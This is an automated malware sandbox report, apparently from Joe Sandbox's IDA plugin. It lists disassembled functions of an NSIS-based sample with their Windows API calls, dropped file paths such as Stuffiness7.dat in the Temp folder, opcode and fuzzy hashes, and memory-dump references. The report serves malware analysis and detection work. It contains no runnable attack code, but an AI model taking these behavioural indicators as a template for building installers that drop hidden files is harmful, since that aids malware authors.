                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                • String ID: A$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\Stuffiness7.dat
                                                                                                                                                                                                                                • API String ID: 2624150263-1276252447
                                                                                                                                                                                                                                • Opcode ID: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                                                                                                                                                                                                                • Instruction ID: a81e8b8b6ddc8ea4f7a7a45a10ce21cc850824e22f7b82fba9ad49fead82d7d1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CBA191B1900208ABDB119FA6DD45AAFB7B8EF84314F10803BF601B62D1D77C9A41CB6D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00406183 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040631E,?,?), ref: 004061BE
                                                                                                                                                                                                                                • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061C7
                                                                                                                                                                                                                                  • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                                                                                                                                                                                                  • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                                                                                                                                                                                                • GetShortPathNameW.KERNEL32(?,00431108,00000400), ref: 004061E4
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00406202
                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 0040623D
                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040624C
                                                                                                                                                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406284
                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DA
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 004062EB
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F2
                                                                                                                                                                                                                                  • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                                                                                                                                                                  • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                                                                                • String ID: %ls=%ls$[Rename]
                                                                                                                                                                                                                                • API String ID: 2171350718-461813615
                                                                                                                                                                                                                                • Opcode ID: 5499eb560c731fe365026282fea1d403a64bc5aecd0ea22a231c31d407be1798
                                                                                                                                                                                                                                • Instruction ID: 71978d88b6039f89b25a0dfa2ffa892efa56fbf884cfe692307f7793e751c739
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5499eb560c731fe365026282fea1d403a64bc5aecd0ea22a231c31d407be1798
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A314670200716BBD2207B659D48F6B3A6CEF45754F15017EFA42F62C2EA3CA821867D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0040657A Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 196stringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,00000400), ref: 00406695
                                                                                                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,00000400,00000000,0042C248,?,004055D6,0042C248,00000000,00000000,?,76F723A0), ref: 004066A8
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,00000000,0042C248,?,004055D6,0042C248,00000000), ref: 00406779
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Directory$SystemWindowslstrcatlstrlen
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\Stuffiness7.dat$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                • API String ID: 4260037668-2629116834
                                                                                                                                                                                                                                • Opcode ID: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                                                                                                                                                                                                                                • Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 004032B4 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 166COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CountTick$wsprintf
                                                                                                                                                                                                                                • String ID: *B$ A$ A$... %d%%$}8@
                                                                                                                                                                                                                                • API String ID: 551687249-3029848762
                                                                                                                                                                                                                                • Opcode ID: 1f086596db69560882dd0e442cad73c65180189b4af0e4169c5b7a1c0c3cb60e
                                                                                                                                                                                                                                • Instruction ID: 54ab186c05730647c672001b6e56d135182c7b51176e178f40f708a1e84a381e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1f086596db69560882dd0e442cad73c65180189b4af0e4169c5b7a1c0c3cb60e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E251BD31810219EBCF11DF65DA44B9E7BB8AF05756F10827BE804BB2C1D7789E44CBA9
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                                                                                                                                                                • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,00000000,00000000,C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5
                                                                                                                                                                                                                                  • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(0042C248,00000000,?,76F723A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,0042C248,00000000,?,76F723A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: lstrcatW.KERNEL32(0042C248,00403418), ref: 004055FA
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: SetWindowTextW.USER32(0042C248,0042C248), ref: 0040560C
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\Stuffiness7.dat
                                                                                                                                                                                                                                • API String ID: 1941528284-456565144
                                                                                                                                                                                                                                • Opcode ID: 7071b985292706a63f1e4b2e85f49b16247090a83eb1416a6af2ac73d7dfe6a7
                                                                                                                                                                                                                                • Instruction ID: 1e3f5e060805a06bac003644be00ba5f3fef1f2c353f2d3d357c0a6c5ca497fd
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7071b985292706a63f1e4b2e85f49b16247090a83eb1416a6af2ac73d7dfe6a7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F4419371900108BACF11BFB5DD85DAE7A79EF45768B20423FF422B10E2D63C8A91966D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00404500 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 0040451D
                                                                                                                                                                                                                                • GetSysColor.USER32(00000000), ref: 0040455B
                                                                                                                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00404567
                                                                                                                                                                                                                                • SetBkMode.GDI32(?,?), ref: 00404573
                                                                                                                                                                                                                                • GetSysColor.USER32(?), ref: 00404586
                                                                                                                                                                                                                                • SetBkColor.GDI32(?,?), ref: 00404596
                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004045B0
                                                                                                                                                                                                                                • CreateBrushIndirect.GDI32(?), ref: 004045BA
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2320649405-0
                                                                                                                                                                                                                                • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                                                                                                                                                                • Instruction ID: 19446832cb8519ea1938040ed984131457e28e93d0b00b9b4dc42373f0e33a15
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 382177B1500705AFCB31DF68DD08B5BBBF8AF41714B058A2EEA96B22E1C734E944CB54
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                                                                                                                                                                                                  • Part of subcall function 0040610E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406124
                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                                                                                • String ID: 9
                                                                                                                                                                                                                                • API String ID: 163830602-2366072709
                                                                                                                                                                                                                                • Opcode ID: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                                                                                                                                                                                                • Instruction ID: 36eba916602f65c1f8b814f2f26102ddc75cc08ed25eda7b441ea0696c55e726
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C551E975D00219AADF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 004067C4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CharNextW.USER32(?,*?|<>/":,00000000,00000000,76F73420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                                                                                                                                                                                                                                • CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                                                                                                                                                                                                                                • CharNextW.USER32(?,00000000,76F73420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                                                                                                                                                                                                                                • CharPrevW.USER32(?,?,76F73420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Char$Next$Prev
                                                                                                                                                                                                                                • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                • API String ID: 589700163-2977677972
                                                                                                                                                                                                                                • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                                                                                                                                                                                • Instruction ID: 8e05d213a2b26a47bd0c986db1e6a85e10b5e067f284fb5e9645f7af11a9ce3c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7311862780161295DB313B158C44A77A2A8AF58798F56843FED86B32C1E77C8C9282AD
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00404E54 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E6F
                                                                                                                                                                                                                                • GetMessagePos.USER32 ref: 00404E77
